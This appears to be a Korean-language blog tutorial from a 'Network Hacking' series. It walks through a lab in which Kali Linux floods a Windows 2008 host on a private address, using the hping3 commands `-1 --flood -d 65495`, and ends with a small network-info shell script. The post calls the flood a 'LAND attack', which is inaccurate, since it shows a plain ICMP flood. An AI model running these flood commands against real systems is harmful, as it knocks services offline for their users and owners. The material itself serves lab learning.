본문 바로가기

Learning/└◆Network Hacking

Internet Layer hping3 CMD [TCP/IP Model]

 

Internet Layer ( ICMP/IGMP, IP(IPv4/IPv6), ARP/RARP)

 

hping3 CMD 

ICMP LAND Attack

 

ICMP LAND Attack(ICMP DoS Attack) 사용하기

 

 

 

 

ICMP LAND Attack(ICMP DoS Attack)

 

 

사용시스템

- win2008 (Victim System)

- KaliLinux (Attack System)

 

 

 

(window2008 서버)

 

windows 2008 서버에 IP를 확인한다.

 

c:\> ipconfig

 

 

작업 관리자를 실행하여 성능 탭을 선택한다.

 

<CTRL + SHIFT + ESC> => 성능탭 => 리소스모니터

 

wireshark 실행하여 패킷 모니터링을 한다.

 

wireshark 실행 시킨다.

 

 

 

 

(Kali Linux)

 

네트워크 자원 Monitoring 툴을 실행한다.

 

# gnome-system-monitor &  

 

타겟 시스템을 확인한다.

 

# hping3 -S 192.168.20.201 -p 80 -c 3

hping3 에 모드를 사용하지않으면 TCP모드로 자동 -S 는 syn -p 포트 -c 카운트

 

타겟 시스템에 Flooding Attack 수행한다.

 

# hping3 -1 192.168.20.201 --flood -p 80 -d 20

-> (windows2008) 서버에서 wireshark 내용을 확인

-> -1 : ICMP Mode

--flood : flooding attack

-p : port number

-d : data size

 

# hping3 -1 192.168.20.201 --flood -p 80 -d 65495      -1 ICMP 모드 --flood 되도록빨리 초당100만번 -d 데이터 사이즈

-> data size를 늘려서 공격한다.

-1 --icmp       ICMP mode

   --flood     sent packets as fast as possible. Don't show replies

-e --sign       add 'signature'

-p --destport  [+][+]<port> destination port(default 0) ctrl+z inc/dec

-d --data       data size (default is 0)

 

(windows2008)

 

네트워크 통화량을 확인한다. ctrl+shift+esc

 

인터넷을 해본다.(약간 느린 느낌이 들것이다.)

 

(주의) 공격자 시스템에도 부하량이 걸린다.

 

 

 

 

참고

ip정보 특정 출력
ifconfig eth0 에 정보확인,inet addr , up유무 만확인
# ifconfig eth0 | egrep '(inet addr:|MTU)'

 

netstat -nr 출력내용 중 라인 처음
# netstat -nr | grep '^0.0.0.0'

 

cat /etc/resolv.conf 정보
# cat /etc/resolv.conf | grep nameserver

-------------------------------------------------
#!/bin/bash

 

echo "-------- ifconfig ---------"| cut -c11-
ifconfig eth0 | egrep '(inet addr:|MTU)'
echo

 

echo "-------- netstat -nr ------"
netstat -nr | grep '^0.0.0.0'
echo

 

echo "--------- cat/etc/resolv.conf ----"
cat /etc/resolv.conf | grep nameserver
echo

-------------------------------------------------